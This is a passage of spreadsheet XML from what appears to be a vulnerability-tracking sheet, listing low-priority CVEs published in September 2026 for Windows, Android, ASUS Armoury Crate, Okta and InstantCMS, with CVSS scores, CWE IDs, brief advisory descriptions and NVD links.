NTFS allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1227" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69591</t></is></c></row><row r="1228"><c r="A1228" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1228" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1228" s="5" t="inlineStr"><is><t>CVE-2026-69637</t></is></c><c r="D1228" s="5" t="n"><v>5.7</v></c><c r="E1228" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1228" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1228" s="5" t="inlineStr" /><c r="H1228" s="5" t="n"><v>0.006</v></c><c r="I1228" s="5" t="inlineStr" /><c r="J1228" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1228" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1228" s="5" t="inlineStr" /><c r="M1228" s="5" t="inlineStr" /><c r="N1228" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1228" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1228" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1228" s="5" t="inlineStr" /><c r="R1228" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="S1228" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="T1228" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69637</t></is></c></row><row r="1229"><c r="A1229" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1229" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1229" s="5" t="inlineStr"><is><t>CVE-2026-69679</t></is></c><c r="D1229" s="5" t="n"><v>5.7</v></c><c r="E1229" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1229" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1229" s="5" t="inlineStr" /><c r="H1229" s="5" t="n"><v>0.006</v></c><c r="I1229" s="5" t="inlineStr" /><c r="J1229" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1229" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1229" s="5" t="inlineStr" /><c r="M1229" s="5" t="inlineStr" /><c r="N1229" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1229" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1229" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1229" s="5" t="inlineStr" /><c r="R1229" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="S1229" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="T1229" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69679</t></is></c></row><row r="1230"><c r="A1230" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1230" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1230" s="5" t="inlineStr"><is><t>CVE-2026-69723</t></is></c><c r="D1230" s="5" t="n"><v>5.7</v></c><c r="E1230" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1230" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1230" s="5" t="inlineStr" /><c r="H1230" s="5" t="n"><v>0.01</v></c><c r="I1230" s="5" t="inlineStr" /><c r="J1230" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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30" s="5" t="inlineStr" /><c r="M1230" s="5" t="inlineStr" /><c r="N1230" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1230" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1230" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1230" s="5" t="inlineStr" /><c r="R1230" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1230" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1230" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69723</t></is></c></row><row r="1231"><c r="A1231" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1231" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1231" s="5" t="inlineStr"><is><t>CVE-2026-75808</t></is></c><c r="D1231" s="5" t="n"><v>5.7</v></c><c r="E1231" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1231" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1231" s="5" t="inlineStr" /><c r="H1231" s="5" t="n"><v>0.001</v></c><c r="I1231" s="5" t="inlineStr" /><c r="J1231" s="5" t="inlineStr" /><c r="K1231" s="5" t="inlineStr" /><c r="L1231" s="5" t="inlineStr" /><c r="M1231" s="5" t="inlineStr" /><c r="N1231" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1231" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1231" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1231" s="5" t="inlineStr" /><c r="R1231" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S1231" s="5" t="inlineStr"><is><t>Allocation of Resources Without Limits or Throttling in ASUS Armoury Crate allows a local user to cause a denial-of-service condition through system memory exhaustion by bypassing driver authentication and allocating an unrestricted amount of memory.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1231" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75808</t></is></c></row><row r="1232"><c r="A1232" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1232" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1232" s="5" t="inlineStr"><is><t>CVE-2026-75810</t></is></c><c r="D1232" s="5" t="n"><v>5.7</v></c><c r="E1232" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1232" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1232" s="5" t="inlineStr" /><c r="H1232" s="5" t="n"><v>0.001</v></c><c r="I1232" s="5" t="inlineStr" /><c r="J1232" s="5" t="inlineStr" /><c r="K1232" s="5" t="inlineStr" /><c r="L1232" s="5" t="inlineStr" /><c r="M1232" s="5" t="inlineStr" /><c r="N1232" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1232" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1232" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1232" s="5" t="inlineStr" /><c r="R1232" s="5" t="inlineStr"><is><t>CWE-749</t></is></c><c r="S1232" s="5" t="inlineStr"><is><t>Exposed Dangerous Method or Function in ASUS Armoury Crate allow a local user to cause a brief system stall by bypassing driver authentication and sending requests to trigger system management interrupts (SMIs). Repeatedly triggering SMI may lead to a denial-of-service (DoS) condition.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1232" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75810</t></is></c></row><row r="1233"><c r="A1233" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1233" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1233" s="5" t="inlineStr"><is><t>CVE-2026-78629</t></is></c><c r="D1233" s="5" t="n"><v>5.6</v></c><c r="E1233" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1233" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1233" s="5" t="inlineStr" /><c r="H1233" s="5" t="n"><v>0.001</v></c><c r="I1233" s="5" t="inlineStr" /><c r="J1233" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1233" s="5" t="inlineStr" /><c r="L1233" s="5" t="inlineStr" /><c r="M1233" s="5" t="inlineStr" /><c r="N1233" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1233" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1233" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1233" s="5" t="inlineStr" /><c r="R1233" s="5" t="inlineStr"><is><t>CWE-303</t></is></c><c r="S1233" s="5" t="inlineStr"><is><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is></c><c r="T1233" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78629</t></is></c></row><row r="1234"><c r="A1234" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1234" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1234" s="5" t="inlineStr"><is><t>CVE-2026-28584</t></is></c><c r="D1234" s="5" t="n"><v>5.5</v></c><c r="E1234" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1234" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1234" s="5" t="inlineStr" /><c r="H1234" s="5" t="n"><v>0.001</v></c><c r="I1234" s="5" t="inlineStr" /><c r="J1234" s="5" t="inlineStr" /><c r="K1234" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1234" s="5" t="inlineStr" /><c r="M1234" s="5" t="inlineStr" /><c r="N1234" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1234" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1234" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1234" s="5" t="inlineStr" /><c r="R1234" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1234" s="5" t="inlineStr"><is><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is></c><c r="T1234" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28584</t></is></c></row><row r="1235"><c r="A1235" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1235" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1235" s="5" t="inlineStr"><is><t>CVE-2026-28596</t></is></c><c r="D1235" s="5" t="n"><v>5.5</v></c><c r="E1235" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1235" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1235" s="5" t="inlineStr" /><c r="H1235" s="5" t="n"><v>0.001</v></c><c r="I1235" s="5" t="inlineStr" /><c r="J1235" s="5" t="inlineStr" /><c r="K1235" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1235" s="5" t="inlineStr" /><c r="M1235" s="5" t="inlineStr" /><c r="N1235" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1235" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1235" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1235" s="5" t="inlineStr" /><c r="R1235" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S1235" s="5" t="inlineStr"><is><t>In parseInterventionFromXml of GameManagerService.java, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1235" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28596</t></is></c></row><row r="1236"><c r="A1236" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1236" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1236" s="5" t="inlineStr"><is><t>CVE-2026-28617</t></is></c><c r="D1236" s="5" t="n"><v>5.5</v></c><c r="E1236" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1236" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1236" s="5" t="inlineStr" /><c r="H1236" s="5" t="n"><v>0.001</v></c><c r="I1236" s="5" t="inlineStr" /><c r="J1236" s="5" t="inlineStr" /><c r="K1236" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1236" s="5" t="inlineStr" /><c r="M1236" s="5" t="inlineStr" /><c r="N1236" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1236" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1236" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1236" s="5" t="inlineStr" /><c r="R1236" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S1236" s="5" t="inlineStr"><is><t>In add of WifiNetworkSuggestionsManager.java, there is a possible persistent DOS due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1236" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28617</t></is></c></row><row r="1237"><c r="A1237" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1237" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1237" s="5" t="inlineStr"><is><t>CVE-2026-28633</t></is></c><c r="D1237" s="5" t="n"><v>5.5</v></c><c r="E1237" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1237" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1237" s="5" t="inlineStr" /><c r="H1237" s="5" t="n"><v>0.001</v></c><c r="I1237" s="5" t="inlineStr" /><c r="J1237" s="5" t="inlineStr" /><c r="K1237" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1237" s="5" t="inlineStr" /><c r="M1237" s="5" t="inlineStr" /><c r="N1237" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1237" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1237" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1237" s="5" t="inlineStr" /><c r="R1237" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S1237" s="5" t="inlineStr"><is><t>In initForUserNoTracing of VoiceInteractionManagerService.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1237" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28633</t></is></c></row><row r="1238"><c r="A1238" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1238" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1238" s="5" t="inlineStr"><is><t>CVE-2026-49883</t></is></c><c r="D1238" s="5" t="n"><v>5.5</v></c><c r="E1238" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1238" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1238" s="5" t="inlineStr" /><c r="H1238" s="5" t="n"><v>0.001</v></c><c r="I1238" s="5" t="inlineStr" /><c r="J1238" s="5" t="inlineStr" /><c r="K1238" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1238" s="5" t="inlineStr" /><c r="M1238" s="5" t="inlineStr" /><c r="N1238" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1238" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1238" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1238" s="5" t="inlineStr" /><c r="R1238" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S1238" s="5" t="inlineStr"><is><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is></c><c r="T1238" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49883</t></is></c></row><row r="1239"><c r="A1239" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1239" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1239" s="5" t="inlineStr"><is><t>CVE-2026-54611</t></is></c><c r="D1239" s="5" t="n"><v>5.5</v></c><c r="E1239" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1239" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1239" s="5" t="inlineStr" /><c r="H1239" s="5" t="n"><v>0.005</v></c><c r="I1239" s="5" t="inlineStr" /><c r="J1239" s="5" t="inlineStr" /><c r="K1239" s="5" t="inlineStr" /><c r="L1239" s="5" t="inlineStr" /><c r="M1239" s="5" t="inlineStr" /><c r="N1239" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1239" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1239" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1239" s="5" t="inlineStr" /><c r="R1239" s="5" t="inlineStr"><is><t>CWE-434, CWE-94</t></is></c><c r="S1239" s="5" t="inlineStr"><is><t>InstantCMS is a free and open source content management system. Versions prior to 2.18.2 have a Remote Code Execution (RCE) issue that allows remote authenticated attackers to execute any PHP code via the component installer. It is possible to upload a malicious component into the server, however, it won't be installed, but upload files will be executed. Normally all php files in upload folder are not executed, however, by uploading custom .htaccess it becomes possible. Version 2.18.2 contains a fix.</t></is></c><c r="T1239" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-54611</t></is></c></row><row r="1240"><c r="A1240" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1240" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1240" s="5" t="inlineStr"><is><t>CVE-2026-68830</t></is></c><c r="D1240" s="5" t="n"><v>5.5</v></c><c r="E1240" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1240" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1240" s="5" t="inlineStr" /><c r="H1240" s="5" t="n"><v>0.003</v></c><c r="I1240" s="5" t="inlineStr" /><c r="J1240" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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0" s="5" t="inlineStr" /><c r="M1240" s="5" t="inlineStr" /><c r="N1240" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1240" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1240" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1240" s="5" t="inlineStr" /><c r="R1240" s="5" t="inlineStr"><is><t>CWE-269, CWE-59</t></is></c><c r="S1240" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t></is></c><c r="T1240" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68830</t></is></c></row><row r="1241"><c r="A1241" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1241" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1241" s="5" t="inlineStr"><is><t>CVE-2026-68831</t></is></c><c r="D1241" s="5" t="n"><v>5.5</v></c><c r="E1241" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1241" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1241" s="5" t="inlineStr" /><c r="H1241" s="5" t="n"><v>0.003</v></c><c r="I1241" s="5" t="inlineStr" /><c r="J1241" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K124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1" s="5" t="inlineStr" /><c r="M1241" s="5" t="inlineStr" /><c r="N1241" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1241" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1241" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1241" s="5" t="inlineStr" /><c r="R1241" s="5" t="inlineStr"><is><t>CWE-552</t></is></c><c r="S1241" s="5" t="inlineStr"><is><t>Files or directories accessible to external parties in Windows Defender Firewall Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1241" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68831</t></is></c></row><row r="1242"><c r="A1242" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1242" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1242" s="5" t="inlineStr"><is><t>CVE-2026-68842</t></is></c><c r="D1242" s="5" t="n"><v>5.5</v></c><c r="E1242" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1242" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1242" s="5" t="inlineStr" /><c r="H1242" s="5" t="n"><v>0.004</v></c><c r="I1242" s="5" t="inlineStr" /><c r="J1242" s="5" t="inlineStr" /><c r="K1242" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1242" s="5" t="inlineStr" /><c r="M1242" s="5" t="inlineStr" /><c r="N1242" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1242" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1242" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1242" s="5" t="inlineStr" /><c r="R1242" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1242" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows MIDI Service Module allows an authorized attacker to disclose information locally.</t></is></c><c r="T1242" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68842</t></is></c></row><row r="1243"><c r="A1243" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1243" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1243" s="5" t="inlineStr"><is><t>CVE-2026-68843</t></is></c><c r="D1243" s="5" t="n"><v>5.5</v></c><c r="E1243" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1243" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1243" s="5" t="inlineStr" /><c r="H1243" s="5" t="n"><v>0.003</v></c><c r="I1243" s="5" t="inlineStr" /><c r="J1243" s="5" t="inlineStr" /><c r="K1243" s="5" t="inlineStr" /><c r="L1243" s="5" t="inlineStr" /><c r="M1243" s="5" t="inlineStr" /><c r="N1243" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1243" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1243" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1243" s="5" t="inlineStr" /><c r="R1243" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1243" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Word allows an authorized attacker to disclose information locally.</t></is></c><c r="T1243" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68843</t></is></c></row><row r="1244"><c r="A1244" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1244" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1244" s="5" t="inlineStr"><is><t>CVE-2026-68851</t></is></c><c r="D1244" s="5" t="n"><v>5.5</v></c><c r="E1244" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1244" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1244" s="5" t="inlineStr" /><c r="H1244" s="5" t="n"><v>0.003</v></c><c r="I1244" s="5" t="inlineStr" /><c r="J1244" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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4" s="5" t="inlineStr" /><c r="M1244" s="5" t="inlineStr" /><c r="N1244" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1244" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1244" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1244" s="5" t="inlineStr" /><c r="R1244" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1244" s="5" t="inlineStr"><is><t>Buffer over-read in Windows NTFS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1244" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68851</t></is></c></row><row r="1245"><c r="A1245" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1245" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1245" s="5" t="inlineStr"><is><t>CVE-2026-68852</t></is></c><c r="D1245" s="5" t="n"><v>5.5</v></c><c r="E1245" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1245" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1245" s="5" t="inlineStr" /><c r="H1245" s="5" t="n"><v>0.003</v></c><c r="I1245" s="5" t="inlineStr" /><c r="J1245" s="5" t="inlineStr" /><c r="K1245" s="5" t="inlineStr" /><c r="L1245" s="5" t="inlineStr" /><c r="M1245" s="5" t="inlineStr" /><c r="N1245" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1245" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1245" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1245" s="5" t="inlineStr" /><c r="R1245" s="5" t="inlineStr"><is><t>CWE-200, CWE-908</t></is></c><c r="S1245" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Account allows an authorized attacker to disclose information locally.</t></is></c><c r="T1245" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68852</t></is></c></row><row r="1246"><c r="A1246" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1246" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1246" s="5" t="inlineStr"><is><t>CVE-2026-68873</t></is></c><c r="D1246" s="5" t="n"><v>5.5</v></c><c r="E1246" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1246" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1246" s="5" t="inlineStr" /><c r="H1246" s="5" t="n"><v>0.005</v></c><c r="I1246" s="5" t="inlineStr" /><c r="J1246" s="5" t="inlineStr" /><c r="K1246" s="5" t="inlineStr" /><c r="L1246" s="5" t="inlineStr" /><c r="M1246" s="5" t="inlineStr" /><c r="N1246" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1246" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1246" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1246" s="5" t="inlineStr" /><c r="R1246" s="5" t="inlineStr"><is><t>CWE-532, CWE-908</t></is></c><c r="S1246" s="5" t="inlineStr"><is><t>Insertion of sensitive information into log file in Windows Program Compatibility Assistant Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1246" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68873</t></is></c></row><row r="1247"><c r="A1247" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1247" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1247" s="5" t="inlineStr"><is><t>CVE-2026-68881</t></is></c><c r="D1247" s="5" t="n"><v>5.5</v></c><c r="E1247" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1247" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1247" s="5" t="inlineStr" /><c r="H1247" s="5" t="n"><v>0.003</v></c><c r="I1247" s="5" t="inlineStr" /><c r="J1247" s="5" t="inlineStr" /><c r="K1247" s="5" t="inlineStr" /><c r="L1247" s="5" t="inlineStr" /><c r="M1247" s="5" t="inlineStr" /><c r="N1247" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1247" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1247" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1247" s="5" t="inlineStr" /><c r="R1247" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1247" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1247" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68881</t></is></c></row><row r="1248"><c r="A1248" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1248" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1248" s="5" t="inlineStr"><is><t>CVE-2026-68886</t></is></c><c r="D1248" s="5" t="n"><v>5.5</v></c><c r="E1248" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1248" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1248" s="5" t="inlineStr" /><c r="H1248" s="5" t="n"><v>0.005</v></c><c r="I1248" s="5" t="inlineStr" /><c r="J1248" s="5" t="inlineStr" /><c r="K1248" s="5" t="inlineStr" /><c r="L1248" s="5" t="inlineStr" /><c r="M1248" s="5" t="inlineStr" /><c r="N1248" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1248" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1248" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1248" s="5" t="inlineStr" /><c r="R1248" s="5" t="inlineStr"><is><t>CWE-209, CWE-416</t></is></c><c r="S1248" s="5" t="inlineStr"><is><t>Use after free in Windows Network Connection Broker allows an authorized attacker to disclose information locally.</t></is></c><c r="T1248" s="6" 